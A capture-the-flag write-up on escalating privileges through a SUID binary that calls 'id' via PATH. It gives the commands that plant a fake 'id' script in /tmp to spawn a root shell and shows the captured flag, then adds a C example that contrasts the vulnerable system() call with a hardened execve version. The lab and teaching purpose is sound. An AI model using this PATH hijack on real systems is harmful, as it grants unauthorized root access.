Insecure (100)

Privilege escalation through SUID files and PATH variable manipulation

Problem

Someone once told me that SUID is a bad idea. Could you show me why?

Solution

The binary calls the id command three times, first without privileges, then as root, then again without privileges.

Because the binary runs with the SUID bit set and looks up id through the PATH variable, we can prepend a directory we control to PATH so that our own id is executed with root privileges. The goal is to read the flag.txt file, which requires root access, so we need to spawn a shell as root.

The following shell script spawns a shell only if it is running as root, which is the case for the second of the three id calls.

# /bin/id is called by absolute path so the script does not recurse into itself
if [ `/bin/id -u` = "0" ]; then
    echo "I am root" && /bin/bash
else
    echo "I am not root"
fi

Translating this into a one-liner, we write it to a file named id in /tmp, make it executable, and put /tmp at the front of PATH so that our script is found before the real id:

$ cd /tmp
$ echo "if [ \`/bin/id -u\` = \"0\" ]; then echo \"I am root\" && /bin/bash; else echo \"I am not root\"; fi" > id
$ chmod 777 id
$ export PATH=/tmp:$PATH

After running the insecure binary, the second id call executes our script as root and we obtain a root shell:

I am not root
I am root

$ cat /flag.txt
DSO-NUS{b4fcfe57b8d2b05ff3310c663a0497b1026cf039baeee18669957152cdc276da}
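The writeup does not show the challenge binary's source, so as an added example (not the challenge's code) here is the pattern it exploits next to a hardened replacement: run_naive lets the shell resolve "id" through the caller's PATH, while run_trusted refuses anything but an absolute path and hands the child a fixed environment. The path /bin/id in main is an assumption taken from the writeup's own script.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* The pattern the writeup exploits: system() hands "id" to /bin/sh, which
 * resolves it through the caller's PATH, so a SUID process ends up running
 * whatever "id" the caller placed first in PATH. Returns the exit status. */
int run_naive(const char *cmd) {
    int status = system(cmd);
    return (status != -1 && WIFEXITED(status)) ? WEXITSTATUS(status) : -1;
}

/* Hardened replacement: the child gets only this fixed environment, so the
 * caller's PATH (and anything else they exported) never reaches it. */
static char *const SAFE_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/* Executes argv[0], which must be an absolute path, with SAFE_ENV and no
 * shell in between. Returns the child's exit status, or -1 on misuse/failure. */
int run_trusted(char *const argv[]) {
    if (argv == NULL || argv[0] == NULL || argv[0][0] != '/') {
        errno = EINVAL;            /* a bare name like "id" is refused */
        return -1;
    }
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(argv[0], argv, SAFE_ENV);
        _exit(127);                /* only reached if execve failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Assumed layout: id lives at /bin/id, as in the writeup's own script. */
    char *const id_argv[] = { "/bin/id", "-u", NULL };
    printf("naive run exited with %d\n", run_naive("id"));
    printf("trusted run exited with %d\n", run_trusted(id_argv));
    return 0;
}
```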
